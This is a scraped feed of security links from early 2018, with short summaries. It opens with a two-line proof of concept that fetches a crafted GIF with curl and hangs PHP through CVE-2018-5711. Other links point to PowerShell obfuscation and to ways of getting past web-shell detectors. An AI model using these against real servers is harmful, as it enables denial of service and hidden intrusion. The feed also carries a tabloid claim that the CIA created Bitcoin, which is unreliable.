Infinite loop PHP with gif
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html
PoC:
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html
PoC:
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'
Orange
PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF
This is 🍊 speaking
Bitcoin is US Dollar 2.0 Created by CIA | Kaspersky Co-founder
https://www.express.co.uk/finance/city/907323/Bitcoin-created-spy-US-government-CIA-MI5-secret-mission-fund-pay-price
https://www.express.co.uk/finance/city/907323/Bitcoin-created-spy-US-government-CIA-MI5-secret-mission-fund-pay-price
Express.co.uk
Bitcoin ‘created as dollar 2.0 by US to fund secret CIA missions'
BITCOIN was created by US intelligence services to send untraceable funding to top-secret international CIA and MI5 missions, according to a shock new claim.
Powershell-Obfuscation
* Reverse String
* Spliting
* Replace string
* Concatenate string
* ...
https://github.com/raminfp/Powershell-Obfuscation
* Reverse String
* Spliting
* Replace string
* Concatenate string
* ...
https://github.com/raminfp/Powershell-Obfuscation
[+] Bypass anti sheller
Today I became aware, ALFA [hxxps://github.com/solevisible/ALFA-SHELL] shell function
this is a technique for bypass anti shell [hxxp://www.shelldetector.com/]
https://gist.github.com/raminfp/976382480f0b59a8d8fd6df901e6dc86
Today I became aware, ALFA [hxxps://github.com/solevisible/ALFA-SHELL] shell function
eval() detected with anti sheller(hxxps://t.me/solevisible/83),this is a technique for bypass anti shell [hxxp://www.shelldetector.com/]
https://gist.github.com/raminfp/976382480f0b59a8d8fd6df901e6dc86
Gist
PHP bypass anti shell
PHP bypass anti shell . GitHub Gist: instantly share code, notes, and snippets.
PWN2OWN 2018 PARTNERS WITH MICROSOFT AND SPONSORED BY VMWARE
https://www.zerodayinitiative.com/blog/2018/1/25/pwn2own-returns-for-2018-partners-with-microsoft-and-sponsored-by-vmware
https://www.zerodayinitiative.com/blog/2018/1/25/pwn2own-returns-for-2018-partners-with-microsoft-and-sponsored-by-vmware
Zero Day Initiative
Pwn2Own Returns for 2018: Partners with Microsoft and Sponsored by VMware
The Quick Summary · Pwn2Own returns for 2018 with five categories of targets : virtualization, web browsers, enterprise applications, servers, and a special Windows Insider Preview Challenge category. · ZDI partners with Microsoft for the event and welcomes…
Exploiting Custom Template Engines
https://depthsecurity.com/blog/exploiting-custom-template-engines
https://depthsecurity.com/blog/exploiting-custom-template-engines
Depth Security | A Konica Minolta Service
Exploiting Custom Template Engines | Depth Security
When performing an application assessment, one of the areas within an app Depth Security pays particular attention to is any ability to define custom templates.
Stack Based Buffer Overflows on x64 (Windows)
https://nytrosecurity.com/2018/01/24/stack-based-buffer-overflows-on-x64-windows/
https://nytrosecurity.com/2018/01/24/stack-based-buffer-overflows-on-x64-windows/
Nytro Security
Stack Based Buffer Overflows on x64 (Windows)
The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the…
Debugging Android third-party Java apps with native methods -
https://kov4l3nko.github.io/blog/2018-01-25-debugging-mixed-android-code/
https://kov4l3nko.github.io/blog/2018-01-25-debugging-mixed-android-code/